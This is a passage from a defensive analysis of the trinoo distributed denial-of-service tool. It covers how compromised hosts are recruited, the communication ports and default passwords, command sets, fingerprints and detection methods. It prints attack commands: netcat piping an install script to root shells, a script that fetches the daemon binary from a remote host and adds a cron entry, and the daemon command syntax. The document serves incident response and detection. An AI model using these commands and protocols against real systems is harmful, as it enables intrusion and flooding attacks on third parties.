      "ttdbserverd", "amd", etc.  Operating systems being targeted appear to
      be primarily Sun Solaris 2.x and Linux (due to the ready availability
      of network sniffers and "root kits" for concealing back doors, etc.),
      but stolen accounts on any architecture can be used for caching tools
      and log files.
      
      3).  A list of vulnerable systems is then used to create a script that
      performs the exploit, sets up a command shell running under the root
      account that listens on a TCP port (commonly 1524/tcp, the
      "ingreslock" service port), and connects to this port to confirm the
      success of the exploit.  In some cases, an electronic mail message is
      sent to an account at a free web based email service to confirm which
      systems have been compromised.
      
      The result is a list of "owned" systems ready for setting up
      back doors, sniffers, or the trinoo daemons or masters.
      
      4). From this list of compromised systems, subsets with the desired
      architecture are chosen for the trinoo network.  Pre-compiled binaries
      of the trinoo daemon are created and stored on a stolen account
      somewhere on the Internet.
      
      5). A script is then run which takes this list of "owned" systems and
      produces yet another script to automate the installation process,
      running each installation in the background for maximum multitasking.
      
      This script uses "netcat" ("nc") to pipe a shell script to the root
      shell listening on, in this case, port 1524/tcp:
      
      ---------------------------------------------------------------------------
      ./trin.sh | nc 128.aaa.167.217 1524 &
      ./trin.sh | nc 128.aaa.167.218 1524 &
      ./trin.sh | nc 128.aaa.167.219 1524 &
      ./trin.sh | nc 128.aaa.187.38 1524 &
      ./trin.sh | nc 128.bbb.2.80 1524 &
      ./trin.sh | nc 128.bbb.2.81 1524 &
      ./trin.sh | nc 128.bbb.2.238 1524 &
      ./trin.sh | nc 128.ccc.12.22 1524 &
      ./trin.sh | nc 128.ccc.12.50 1524 &
       . . .
      ---------------------------------------------------------------------------
      
      The script "trin.sh", whose output is being piped to these systems,
      looks like:
      
      ---------------------------------------------------------------------------
      echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
      echo "echo rcp is done moving binary"
      
      echo "chmod +x /usr/sbin/rpc.listen"
      
      echo "echo launching trinoo"
      echo "/usr/sbin/rpc.listen"
      
      echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
      echo "crontab cron"
      echo "echo launched"
      echo "exit"
      ---------------------------------------------------------------------------
      
      Depending on how closely crontab files are monitored, or if they are
      used at all, this may be detected easily.  If cron is not used at all
      by this user (usually root), it may not be detected at all.
      
      Another method was witnessed on at least one other system, where the
      daemon was named "xterm", and was started using a script (named "c" on
      the system on which it was found) that contains:
      
      ---------------------------------------------------------------------------
      cd /var/adm/.1
      PATH=.:$PATH
      export PATH
      xterm 1>/dev/null 2>&1
      ---------------------------------------------------------------------------
      
      This would supposedly imply a method of running this script on demand
      to set up the trinoo network.
      
      Even more subtle ways of having trinoo daemons/masters lie in wait for
      execution at a given time are easy to envision (e.g., UDP or ICMP
      based client/server shells, such as LOKI (see Appendix C) , programs
      that wake up periodically and open a listening TCP or UDP port, etc.)
      
      The result of this automation is the ability for attackers to set up
      the denial of service network, on widely dispersed systems whose true
      owners don't even know are out of their control, in a very short time
      frame.
      
      6).  Optionally, a "root kit" is installed on the system to hide the
      presence of programs, files, and network connections.   This is more
      important on the master system, since these systems are key to the
      trinoo network. (It should be noted that in many cases, masters have
      been set up on Internet Service Providers' primary name server hosts,
      which would normally have extremely high packet traffic and large
      numbers of TCP and UDP connections, which would effectively hide any
      trinoo related traffic or activity, and would likely not be detected.
      (The fact that these are primary name servers would also tend to make
      the owners less likely to take the system off the Internet when
      reports begin to come in about suspected denial of service related
      activity.)
      
      Root kits would also be used on systems running sniffers that, along
      with programs like "hunt" (TCP/IP session hijacking tool) are used to
      burrow further into other networks directly, rather than through
      remote buffer overrun exploits (e.g., to find sites to set up new file
      repositories, etc.)
      
      For more on "root kits" and some ways to get around them, see:
      
              http://staff.washington.edu/dittrich/misc/faqs/rootkits.faq
      
      
      The network: attacker(s)-->master(s)-->daemon(s)-->victim(s)
      ------------------------------------------------------------
      
      The trinoo network is made up of a master server ("master.c") and the
      trinoo daemon ("ns.c").  A trinoo network would look like this:
      
      
                        +----------+           +----------+
                        | attacker |           | attacker |
                        +----------+           +----------+
                             |                      |
              . . . --+------+---------------+------+----------------+-- . . .
                      |                      |                       |
                      |                      |                       |
                 +----------+           +----------+            +----------+
                 |  master  |           |  master  |            |  master  |
                 +----------+           +----------+            +----------+
                      |                      |                       |
                      |                      |                       |
      . . . ---+------+-----+------------+---+--------+------------+-+-- . . .
               |            |            |            |            |
               |            |            |            |            |
           +--------+   +--------+   +--------+   +--------+   +--------+
           | daemon |   | daemon |   | daemon |   | daemon |   | daemon |
           +--------+   +--------+   +--------+   +--------+   +--------+
      
      
      The attacker(s) control one or more "master" servers, each of which
      can control many "daemons" (known in the code as "Bcast", or
      "broadcast" hosts.)  The daemons are all instructed to coordinate a
      packet based attack against one or more victim systems.
      
      All that is then needed is the ability to establish a TCP connection
      to the master hosts using "telnet" and the password to the master
      server to be able to wage massive, coordinated, denial of service
      attacks.
      
      
      Communication ports
      -------------------
      
          Attacker to Master(s):      27665/tcp
          Master to daemon(s):        27444/udp
          Daemon to Master(s):        31335/udp
      
      Remote control of the trinoo master is accomplished via a TCP
      connection to port 27665/tcp.  After connecting, the user must give
      the proper password ("betaalmostdone").  If another connection is made
      to the server while someone is already authenticated, a warning is
      sent to them with the IP address of the connecting host (it appears
      there is a bug that reports incorrect IP addresses, but a warning is
      still communicated).  This will no doubt be fixed eventually and will
      then give the attackers time to clean up and cover their tracks.
      
      Communication from the trinoo master to daemons is via UDP packets
      on port 27444/udp.  Command lines are space separated lines of the
      form:
      
              arg1 password arg2
      
      The default password for commands is "l44adsl", and only command lines
      that contain the substring "l44" are processed.
      
      Communication from the trinoo daemons and the master is via UDP
      packets on port 31335/udp.
      
      When the daemon starts, it initially sends "*HELLO*" to the master,
      which maintains a list of active daemons that it controls (packet
      captured using "sniffit"):
      
      UDP Packet ID (from_IP.port-to_IP.port): 192.168.0.1.32876-10.0.0.1.31335
       45 E 00 . 00 . 23 # B1 . 5D ] 40 @ 00 . F8 . 11 . B9 . 27 . C0 . A8 . 00 . 01 .
       0A . 00 . 00 . 01 . 80 . 6C l 7A z 67 g 00 . 0F . 06 . D4 . 2A * 48 H 45 E 4C L
       4C L 4F O 2A *
      
      If the trinoo master sends a "png" command to a daemon on port
      27444/udp, the daemon will reply to the server that just sent the "png"
      command by sending the string "PONG" on port 31335/udp:
      
      UDP Packet ID (from_IP.port-to_IP.port): 10.0.0.1.1024-192.168.0.1.27444
       45 E 00 . 00 . 27 ' 1A . AE . 00 . 00 . 40 @ 11 . 47 G D4 . 0A . 00 . 00 . 01 .
       C0 . A8 . 00 . 01 . 04 . 00 . 6B k 34 4 00 . 13 . 2F / B7 . 70 p 6E n 67 g 20  
       6C l 34 4 34 4 61 a 64 d 73 s 6C l
      
      UDP Packet ID (from_IP.port-to_IP.port): 192.168.0.1.32879-10.0.0.1.31335
       45 E 00 . 00 . 20   13 . 81 . 40 @ 00 . F8 . 11 . 57 W 07 . C0 . A8 . 00 . 01 .
       0A . 00 . 00 . 01 . 80 . 6F o 7A z 67 g 00 . 0C . 4E N 24 $ 50 P 4F O 4E N 47 G
      
      
      Password protection
      -------------------
      
      Both the master and daemons are password protected to prevent
      system administrators (or other hacker groups) from being able to take
      control of the trinoo network.  These passwords are crypt() style
      passwords.  They are used in a symmetric fashion, where the encrypted
      password is compiled into the master and daemons and used to compare
      against the clear-text version of the password that is sent over the
      network (the current version does not encrypt the actual session, so the
      clear-text passwords are exposed in transit and the master control
      sessions are subject to TCP session highjacking).
      
      When initially run, the master daemon produces a prompt, waiting
      for a password.  If the proper password is not received, the program
      exits.  If the proper password is given, the process announces its
      execution, forks to continue running in the background, and exits:
      
          # ./master
          ?? wrongpassword
          # 
            . . .
      
          # ./master
          ?? gOrave
          trinoo v1.07d2+f3+c [Sep 26 1999:10:09:24]
          # 
      
      Likewise, when you connect to the remote command port (default
      27665/tcp), you must also give a password:
      
          attacker$ telnet 10.0.0.1 27665
          Trying 10.0.0.1
          Connected to 10.0.0.1
          Escape character is '^]'.
          kwijibo
          Connection closed by foreign host.
           . . .
      
          attacker$ telnet 10.0.0.1 27665
          Trying 10.0.0.1
          Connected to 10.0.0.1
          Escape character is '^]'.
          betaalmostdone
          trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]
      
      
          trinoo>
      
      Certain commands sent to the trinoo daemons by the master are also
      password protected.  This password is sent in clear text between the
      master and daemons.
      
      The default passwords were:
      
          "l44adsl"           trinoo daemon password
          "gOrave"            trinoo master server startup ("?? " prompt)
          "betaalmostdone"    trinoo master remote interface password
          "killme"            trinoo master password to control "mdie" command
      
      
      Master commands
      ---------------
      
      The trinoo master supports the following commands:
       
        die           Shut down the master.
      
        quit          Log off the master.
      
        mtimer N      Set DoS timer to N seconds.  N can be between 1 and 1999
                      seconds. If N is < 1, it defaults to 300. If N
                      is > 2000, it defaults to 500.
      
        dos IP        DoS the IP address specified.  A command ("aaa l44adsl
                      IP") is sent to each Bcast host (i.e., trinoo daemons)
                      telling them to DoS the specified IP address.
      
        mdie pass     Disable all Bcast hosts, if the correct password is
                      specified. A command is sent ("d1e l44adsl") to each
                      Bcast host telling them to shut down.  A separate
                      password is required for this command.
      
        mping         Send a PING command ("png l44adsl") to every active
                      Bcast host.
      
        mdos <ip1:ip2:ip3>
                      Multiple DoS.  Sends a multiple DoS command
                      ("xyz l44adsl 123:ip1:ip2:ip3") to each Bcast host.
      
        info          Print version and compile information, e.g.:
        
           This is the "trinoo" AKA DoS Project master server version v1.07d2+f3+c
           Compiled 15:08:41 Aug 16 1999
      
        msize         Set the buffer size for packets sent during DoS attacks.
      
        nslookup host Do a name service lookup of the specified host from
                      the perspective of the host on which the master
                      server is running.
      
        killdead      Attempts to weed out all dead Bcast hosts by first
                      sending all known Bcast hosts a command ("shi l44adsl")
                      that causes any active daemons to reply with the initial
                      "*HELLO*" string, then renames the Bcast file (with
                      extension "-b") so it will be re-initialized when the
                      "*HELLO*" packets are received.
      
        usebackup     Switch to the backup Bcast file created by the
                      "killdead" command.
      
        bcast         List all active Bcast hosts.
      
        help [cmd]    Give a (partial) list of commands, or a brief
                      description of the command "cmd" if specified.
      
        mstop         Attempts to stop a DoS attack (not implemented, but
                      listed in the help command).
      
      
      Daemon commands
      ---------------
      
      The trinoo daemon supports the following commands:
      
        aaa pass IP   DoS the specified IP address.  Sends UDP packets to random
                      (0-65534) UDP ports on the specified IP addresses for
                      a period of time (default is 120 seconds, or 1 - 1999
                      seconds as set by the "bbb" command.)  The size of the
                      packets is that set by the "rsz" command, or the default
                      size of 1000 bytes.
      
        bbb pass N    Sets time limit (in seconds) for DoS attacks.
      
        shi pass      Sends the string "*HELLO*" to the list of master servers
                      compiled into the program on port 31335/udp.
      
        png pass      Sends the string "PONG" to the master that issued the
                      the command on port 31335/udp.
      
        d1e pass      Shut down the trinoo daemon.
      
        rsz N         Set size of buffer for DoS attacks to N bytes.
                      (The trinoo daemon simply malloc()s a buffer with this
                      size, then sends the uninitialized contents of the
                      buffer during an attack.)
      
        xyz pass 123:ip1:ip2:ip3
                      Multiple DoS.  Does the same thing as the "aaa"
                      command, but for multiple IP addresses.
      
      It could be coincidence, but I will give the author some credit and
      assume that three letter commands were chosen so they don't show up in
      the binary as visible strings under the default behavior of
      STRINGS(1).  You must use the "--bytes=3" option of GNU STRINGS(1) to
      see the commands:
      
              # strings --bytes=3 ns | tail -15
              socket
              bind
              recvfrom
              l44
              %s %s %s
              aIf3YWfOhw.V.
              aaa
              bbb
              shi
              png
              PONG
              d1e
              rsz
              xyz
              *HELLO*
      
      
      Fingerprints
      ------------
      
      The method used to install the trinoo daemon on some systems employs
      a crontab entry to start the daemon every minute.  Examining crontab
      files would locate this entry:
      
          * * * * * /usr/sbin/rpc.listen
      
      The master program creates a file (default name "...") containing the
      set of Bcast hosts.  If the command "killdead" is used, an "shi" command
      is sent to all daemons listed in "...", which causes them to send the
      initial "*HELLO*" string to all masters. The current list is renamed
      (default "...-b") and a new list is then generated as each remaining
      live daemon sends its "*HELLO*".
      
      The source code ("master.c") contains the following lines:
      
      ------------------------------------------------------------------------------
      . . .
      /* crypt key encrypted with the key 'bored'(so hex edit cannot get key easily?)
         comment out for no encryption... */
      #define CRYPTKEY "ZsoTN.cq4X31"
      . . .
      ------------------------------------------------------------------------------
      
      If the program was compiled with CRYPTKEY defined, the IP addresses of
      Bcast hosts are encrypted using the Blowfish encryption algorithm:
      
          # ls -l ... ...-b
          -rw-------   1 root     root           25 Sep 26 14:46 ...
          -rw-------   1 root     root           50 Sep 26 14:30 ...-b
          # cat ...
          JPbUc05Swk/0gMvui18BrFH/
          # cat ...-b
          aE5sK0PIFws0Y0EhH02fLVK.
          JPbUc05Swk/0gMvui18BrFH/
      
      Assuming there is no "root kit" present to hide processes, the master
      server shows the following network socket fingerprints (of course, the
      names and directory locations of either program are subject to change):
      
      ------------------------------------------------------------------------------
      # netstat -a --inet
      Active Internet connections (servers and established)
      Proto Recv-Q Send-Q Local Address           Foreign Address         State      
      tcp        0      0 *:27665                 *:*                     LISTEN      
      . . .
      udp        0      0 *:31335                 *:*                                 
      . . .
      
      # lsof | egrep ":31335|:27665"
      master   1292     root    3u  inet       2460              UDP *:31335 
      master   1292     root    4u  inet       2461              TCP *:27665 (LISTEN)
      
      # lsof -p 1292
      COMMAND  PID USER   FD   TYPE DEVICE    SIZE  NODE NAME
      master  1292 root  cwd    DIR    3,1    1024 14356 /tmp/...
      master  1292 root  rtd    DIR    3,1    1024     2 /
      master  1292 root  txt    REG    3,1   30492 14357 /tmp/.../master
      master  1292 root  mem    REG    3,1  342206 28976 /lib/ld-2.1.1.so
      master  1292 root  mem    REG    3,1   63878 29116 /lib/libcrypt-2.1.1.so
      master  1292 root  mem    REG    3,1 4016683 29115 /lib/libc-2.1.1.so
      master  1292 root    0u   CHR    4,1          2967 /dev/tty1
      master  1292 root    1u   CHR    4,1          2967 /dev/tty1
      master  1292 root    2u   CHR    4,1          2967 /dev/tty1
      master  1292 root    3u  inet   2534           UDP *:31335 
      master  1292 root    4u  inet   2535           TCP *:27665 (LISTEN)
      ------------------------------------------------------------------------------
      
      A system running a daemon would show the following:
      
      ------------------------------------------------------------------------------
      # netstat -a --inet
      Active Internet connections (servers and established)
      Proto Recv-Q Send-Q Local Address           Foreign Address         State      
      . . .
      udp        0      0 *:1024                  *:*                                 
      udp        0      0 *:27444                 *:*                                 
      . . .
      
      # lsof | egrep ":27444"
      ns       1316     root    3u  inet       2502              UDP *:27444 
      
      # lsof -p 1316
      COMMAND  PID USER   FD   TYPE DEVICE    SIZE   NODE NAME
      ns      1316 root  cwd    DIR    3,1    1024 153694 /tmp/...
      ns      1316 root  rtd    DIR    3,1    1024      2 /
      ns      1316 root  txt    REG    3,1    6156 153711 /tmp/.../ns
      ns      1316 root  mem    REG    3,1  342206  28976 /lib/ld-2.1.1.so
      ns      1316 root  mem    REG    3,1   63878  29116 /lib/libcrypt-2.1.1.so
      ns      1316 root  mem    REG    3,1 4016683  29115 /lib/libc-2.1.1.so
      ns      1316 root    0u   CHR    4,1           2967 /dev/tty1
      ns      1316 root    1u   CHR    4,1           2967 /dev/tty1
      ns      1316 root    2u   CHR    4,1           2967 /dev/tty1
      ns      1316 root    3u  inet   2502            UDP *:27444 
      ns      1316 root    4u  inet   2503            UDP *:1024 
      ------------------------------------------------------------------------------
      
      
      Defenses
      --------
      
      Of course, the best defense is to prevent intrusions and root level
      compromise of your systems in the first place, so there would be no
      systems on which to install trinoo master/daemons.  In an ideal world,
      all systems would be patched, secured, monitored, intrusion detection
      systems and firewalls would be available to detect and reject packets,
      and I'd be a multi-millionaire living six months of the year in a beach
      mansion on Bali, and six months in the French Alps.  In the real world,
      this is not an option (at least not in the foreseeable future.)
      
      Instead, your network may already have several trinoo daemons running
      and ready to DoS other systems at any minute.  So how can they be
      detected or disabled?
      
      Because the programs use high numbered UDP ports for both communication
      and attack, it will be very difficult (if not impossible) to block it
      without breaking programs that use UDP on high numbered ports.
      
      The easiest method to detect the presence of trinoo masters or daemons
      (as the code exists presently) may be to monitor all UDP packets on
      shared Ethernet segments and look for the tell tale signs of
      communication between master(s) and daemon(s) as described elsewhere in
      this paper. (Switches would preclude seeing UDP packets that are not
      associated with the MAC address of the monitoring host's network
      interface.)  Unfortunately, this would only occur during an attack,
      which would likely become known by network throughput degradation and/or
      reports of denial of service attacks from victim sites.
      
      If a system is suspected of hosting a trinoo daemon that is actively
      attacking, the output of the Solaris "truss" program on the running
      daemon will show output like the following:
      
      ------------------------------------------------------------------------------
       . . .
      getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C)   = 0
      getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) (sleeping...)
      getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C)   = 0
      time()                                          = 938385467
      open("/dev/udp", O_RDWR)                        = 5
      ioctl(5, I_PUSH, "sockmod")                     = 0
      ioctl(5, I_STR, 0xEFFFF748)                     = 0
      ioctl(5, I_SETCLTIME, 0xEFFFF7FC)               = 0
      ioctl(5, I_SWROPT, 0x00000002)                  = 0
      sigprocmask(SIG_SETMASK, 0xEFFFF7EC, 0xEFFFF7DC) = 0
      ioctl(5, I_STR, 0xEFFFF660)                     = 0
      sigprocmask(SIG_SETMASK, 0xEFFFF7DC, 0xEFFFF7B8) = 0
      sigprocmask(SIG_BLOCK, 0xEFFFF548, 0xEFFFF5C0)  = 0
      ioctl(5, I_STR, 0xEFFFF548)                     = 0
      sigprocmask(SIG_SETMASK, 0xEFFFF5C0, 0x00000000) = 0
      putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
      time()                                          = 938385467
      putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
      time()                                          = 938385467
      putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
      time()                                          = 938385467
      putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
      time()                                          = 938385467
      putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
      time()                                          = 938385467
      putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
      time()                                          = 938385467
      putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
      time()                                          = 938385467
      putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
      time()                                          = 938385467
      putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
      time()                                          = 938385467
      putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
      time()                                          = 938385467
       . . .
      ------------------------------------------------------------------------------
      
      The traffic on the network during an attack against a single target
      (as seen by "tcpdump") would look like:
      
      ------------------------------------------------------------------------------
      # tcpdump ip host 192.168.0.1
       . . .
      15:40:08.491782 10.0.0.1.1024 > 192.168.0.1.27444: udp 25
      15:40:08.574453 192.168.0.1.32885 > 216.160.XX.YY.16838: udp 4 (DF)
      15:40:08.576427 192.168.0.1.32885 > 216.160.XX.YY.5758: udp 4 (DF)
      15:40:08.579752 192.168.0.1.32885 > 216.160.XX.YY.10113: udp 4 (DF)
      15:40:08.583056 192.168.0.1.32885 > 216.160.XX.YY.17515: udp 4 (DF)
      15:40:08.600948 192.168.0.1.32885 > 216.160.XX.YY.31051: udp 4 (DF)
      15:40:08.604943 192.168.0.1.32885 > 216.160.XX.YY.5627: udp 4 (DF)
      15:40:08.610886 192.168.0.1.32885 > 216.160.XX.YY.23010: udp 4 (DF)
      15:40:08.614202 192.168.0.1.32885 > 216.160.XX.YY.7419: udp 4 (DF)
      15:40:08.615507 192.168.0.1.32885 > 216.160.XX.YY.16212: udp 4 (DF)
      15:40:08.616854 192.168.0.1.32885 > 216.160.XX.YY.4086: udp 4 (DF)
      15:40:08.618827 192.168.0.1.32885 > 216.160.XX.YY.2749: udp 4 (DF)
      15:40:08.623480 192.168.0.1.32885 > 216.160.XX.YY.12767: udp 4 (DF)
      15:40:08.625458 192.168.0.1.32885 > 216.160.XX.YY.9084: udp 4 (DF)
      15:40:08.628764 192.168.0.1.32885 > 216.160.XX.YY.12060: udp 4 (DF)
      15:40:08.632090 192.168.0.1.32885 > 216.160.XX.YY.32225: udp 4 (DF)
       . . .
      ------------------------------------------------------------------------------
      
      
      Weaknesses
      ----------
      
      The first weakness is that the crypt() encrypted passwords, and some
      prompts and return strings, are visible in both the master and daemon
      binary images.
      
      This can allow you to identify whether you have found a master or a
      daemon, determine whether the passwords are the defaults shown in this
      paper or not, and potentially allow you to exploit the password
      weaknesses to take control of some/all of the trinoo network yourself.
      
      If the source code has been modified (which it no doubt will by smarter
      attackers), you would need to crack the passwords, or use a
      hexadecimal/ASCII editor (e.g., "xxd", part of the VIM editor suite) and
      change them in the binary image, in order to, for example, run the
      master to retrieve the list of daemons.
      
      If the source has not, you can determine this fact by observing the
      strings embedded in the program binary:
      
      ------------------------------------------------------------------------------
      # strings - ns
       . . .
      socket
      bind
      recvfrom
      %s %s %s
      aIf3YWfOhw.V.           <=== crypt() encrypted password "l44adsl"
      PONG
      *HELLO*
       . . .
      
      # strings - master
       . . .
      ---v
      v1.07d2+f3+c
      trinoo %s
      l44adsl                 <=== clear text version of daemon password
      sock
      0nm1VNMXqRMyM           <=== crypt() encrypted password "gOrave"
      10:09:24
      Sep 26 1999
      trinoo %s [%s:%s]
      bind
      read
      *HELLO*
      ZsoTN.cq4X31            <=== CRYPTKEY
      bored
      NEW Bcast - %s
      PONG
      PONG %d Received from %s
      Warning: Connection from %s
      beUBZbLtK7kkY           <=== crypt() encrypted password "betaalmostdone"
      trinoo %s..[rpm8d/cb4Sx/]
       . . .
      DoS: usage: dos <ip>
      DoS: Packeting %s.
      aaa %s %s
      mdie
      ErDVt6azHrePE           <=== crypt() encrypted password for "mdie" command
      mdie: Disabling Bcasts.
      d1e %s
      mdie: password?
       . . .
      ------------------------------------------------------------------------------
      
      Next, and more vulnerable, is the daemon password, which travels the
      network in clear text form.  Assuming you know the UDP port on which the
      master communicates to the client, you can capture the password using
      "sniffit", "ngrep", "tcpdump", or any network monitoring program capable
      of showing UDP packet data payloads (see Appendix A for a sample
      session logged with "ngrep").
      
      For example, here is the "png" command being sent to the trinoo daemon
      as seen by "sniffit":
      
      UDP Packet ID (from_IP.port-to_IP.port): 10.0.0.1.1024-192.168.0.1.27444
       45 E 00 . 00 . 27 ' 1A . AE . 00 . 00 . 40 @ 11 . 47 G D4 . 0A . 00 . 00 . 01 .
       C0 . A8 . 00 . 01 . 04 . 00 . 6B k 34 4 00 . 13 . 2F / B7 . 70 p 6E n 67 g 20  
       6C l 34 4 34 4 61 a 64 d 73 s 6C l
      
      As was mentioned earlier, the "mdie" command in the trinoo master is
      password protected in the master itself.  There are a couple ways
      to attack this.
      
      If you can determine the crypt() encrypted string using the Unix
      "strings" command, you could (potentially) use a password cracking
      utility, such as "crack",  and break it (see Appendix C).  This may
      take a LONG time if the password was well chosen, but it is feasible
      (and the "killme" password for the "mdie" command was cracked in less
      than 30 seconds on a Pentium II).
      
      You could try to sniff the password on the wire between the attacker
      and the master, but presumably this command would not be used by the
      attackers often, if at all, since they want the daemons to be active
      when needed for an attack.
      
      You may have more luck sniffing the daemon password, since it is
      required for most commands.  This can be done on either the daemon's or
      master's network (these are usually entirely different networks.) It
      should be easier to accomplish on the daemon's network since there are
      far more daemons than masters.  Since many of the masters have been
      found on primary name servers, presumably there would be more traffic
      on high-numbered UDP ports on networks containing masters than on
      networks containing daemons (outside of the duration of denial of
      service attacks, that is.) Furthermore you will likely find several
      daemons at a given site, possibly as a result of detecting the
      original system compromise.
      
      Once you have located a daemon, you have also found the list of IP
      addresses of masters (use "strings" to see them.)  You should
      immediately contact these sites and convince them to closely inspect the
      system for signs of intrusion, with likely "root kit" installations to
      make this task more difficult, and attempt to coordinate a response.
      
      Having found a master, the list of daemons (which will likely include
      hosts at many other sites) can be obtained by simply identifying the
      file which contains the list, if unencrypted.  If, however, the file is
      encrypted, you would either have to decrypt the Blowfish encrypted file
      using the same key compiled into the program, or by taking control of
      the master and using the "bcast" command.
      
      It you have identified an active command session to a master, which is
      a standard "telnet" style TCP session, you could hijack the session
      using "hunt" and start executing commands.  Not knowing the "mdie"
      command password, you could not disable all the daemons directly, but
      you COULD use the "bcast" command and get a list of all of them (you
      would probably want to do this using the "script" command to generate
      a transcript of the session, as this could be a very large list).
      
      Once you know the addresses of all the daemons, and the daemon
      password (visible in "strings" output), you could then send the proper
      command string in UDP packets to any suspected trinoo daemon(s).
      Creation and transmission of UDP packets can be accomplished with
      tools like LibNet, Spak, the Perl Net::RawIP library, etc.  (A Perl
      script using Net::RawIP named "trinot" has been developed to
      accomplish this task.  See Appendix B).
      
      As the typical installation of the daemon includes a crontab entry
      that runs it every minute, you would have to constantly spray your
      entire network to keep the daemons from re-starting.  (This may be due
      to programming bugs that cause the daemons to crash occasionally, or
      may be to defeat system administrators who simply notice and kill the
      process, but do not think to check for a crontab entry that re-starts
      the daemon.)
      
      The daemons can also be found on your network by sniffing the data
      portion of UDP packets for the strings "*HELLO*" and "PONG", or any of
      the command strings themselves for that matter (until the source is
      modified to change these strings, of course.) The "ngrep" program
      works nicely for this:
      
      ------------------------------------------------------------------------------
      # ngrep -i -x "*hello*|pong" udp
      interface: eth0 (192.168.0.200/255.255.255.0)
      filter: ip and ( udp )
      match: *hello*|pong
       . . .
      #
      U 192.168.0.1:32887 -> 10.0.0.1:31335
        2a 48 45 4c 4c 4f 2a                                  *HELLO*         
      ###
      U 192.168.0.1:32888 -> 10.0.0.1:31335
        50 4f 4e 47                                           PONG            
      U 192.168.0.3:32815 -> 10.0.0.1:31335
        50 4f 4e 47                                           PONG            
      U 192.168.0.5:32798 -> 10.0.0.1:31335
        50 4f 4e 47                                           PONG            
       . . .
      ------------------------------------------------------------------------------
      
      While not weaknesses in trinoo itself, there are also weaknesses in
      the way the trinoo networks are set up.
      
      As mentioned earlier, some systems showed crontab entries used to
      start the daemons once per minute.  This leaves an obvious fingerprint
      on crontab files.
      
      The scripts observed to automate the installation of trinoo networks
      use the Berkeley "rcp" command (use of rcp has also been observed in a
      file upload capability built into newer versions of the "Tribe Flood
      Network" daemon program).  Monitoring "rcp" connections (514/tcp) from
      multiple systems on your network, in quick succession, to a single IP
      address outside your network would be a good trigger. (Note that the
      use of "rcp" in a script requires an anonymous trust relationship,
      usually in the form of "+ +" in a user's ~/.rhosts file, which also
      will allow you to immediately archive the contents of this account
      while contacting the owners to preserve evidence.)
      
      (Further analysis of trinoo by George Weaver of Pennsylvania State
      University and David Brumley of Stanford niversity is included in
      Appendix E - Further methods of detecting trinoo.  George deserves
      special credit for attempting to hand-decompile a recovered SPARC
      binary image! ;)
      
      
      The next logical evolutionary steps
      -----------------------------------
      
      One of the easiest attacks to implement is the denial of service
      attack.  Many bugs exist in TCP/IP stacks, for example, that allow
      fragmented packets, large packets, IP options, half-open TCP
      connections, or floods of packets (highest bandwidth wins) etc., to
      cause the system performance to be degraded, or actually crash the
      system.
      
      As each bug is found, an exploit program demonstrating the bug is
      generally produced.  Each of these exploit programs is generally
      unique, exploiting a specific bug that may only affect a single TCP/IP
      implementation (although with Microsoft having such a large market
      share of personal computers, and many home users being almost totally
      unaware of such bugs, let alone where to get and how to apply patches
      to fix these bugs, the chances are high that a multi-exploit attack
      will succeed in crashing the target system.)
      
      These denial of service exploits are available from numerous sites
      on the Internet, such as:
      
              http://www.technotronic.com/denial.html
              http://www.rootshell.com/
      
      The next step was to combine multiple denial of service exploits
      into one tool, using Unix shell scripts.  One such tool, named "rape",
      (according to the code it was written in 1998 by "mars", with
      modifications by "TheVirus" and further code improvements by "ttol")
      integrates the following exploits into a single shell script:
      
        echo "Editted for use with www.ttol.base.org"
        echo "rapeing $IP. using weapons:"
        echo  "latierra          "
        echo -n "teardrop v2        "
        echo -n "newtear           "
        echo -n "boink             "
        echo -n "bonk              "
        echo -n "frag              "
        echo -n "fucked            "
        echo -n "troll icmp        "
        echo -n "troll udp         "
        echo -n "nestea2            "
        echo -n "fusion2           "
        echo -n "peace keeper      "
        echo -n "arnudp            "
        echo -n "nos               "
        echo -n "nuclear           "
        echo -n "ssping            "
        echo -n "pingodeth         "
        echo -n "smurf             "
        echo -n "smurf4            "
        echo -n "land              "
        echo -n "jolt              "
        echo -n "pepsi             "
      
      A tool like this has the advantage of allowing an attacker to give a
      single IP address and have multiple attacks be launched (increasing
      the probability of successful attack), but meant having to have
      pre-compiled versions of each individual exploit packaged up in a Unix
      "tar" format archive, etc., for convenient transfer to a (usually
      stolen) account from which to launch the attack.
      
      To still allow multiple denial of service exploits to be used, but with
      a single pre-compiled program that is more easy to store, transfer,
      and use quickly, programs like "targa.c" by Mixter were developed.
      Targa combines all of the following exploits in a single C source
      program:
      
      /* targa.c - copyright by Mixter <mixter@gmx.net>
         version 1.0 - released 6/24/98 - interface to 8
         multi-platform remote denial of service exploits
       */                                                                             
       . . .
      
      /* bonk by route|daemon9 & klepto
       * jolt by Jeff W. Roberson (modified by Mixter for overdrop effect)
       * land by m3lt
       * nestea by humble & ttol
       * newtear by route|daemon9
       * syndrop by PineKoan
       * teardrop by route|daemon9
       * winnuke by _eci */                                                           
      
      Even combined denial of service tools like "targa" still only allow
      one attacker to hit one IP address at a time.
      
      To increase the effectiveness of the attack, groups of attackers,
      using IRC channels or telephone "voice bridges" for communication,
      could coordinate attacks, each person hitting a different system.
      This same coordination is being seen in probing for vulnerabilities,
      and in system compromise and control using multiple back doors
      and "root kits."
      
      Even this has its limits, so in less than two years, it appears the
      next logical step has been taken to combine the power of a number of
      compromised systems into a distributed "denial of service cluster."
      The "trinoo" tool is an example of this, as is another similar tool
      available in the computer underground called the "Tribe Flood Network"
      (or "TFN") by Mixter.
      
      While trinoo only implements UDP flood attacks, TFN supports ICMP
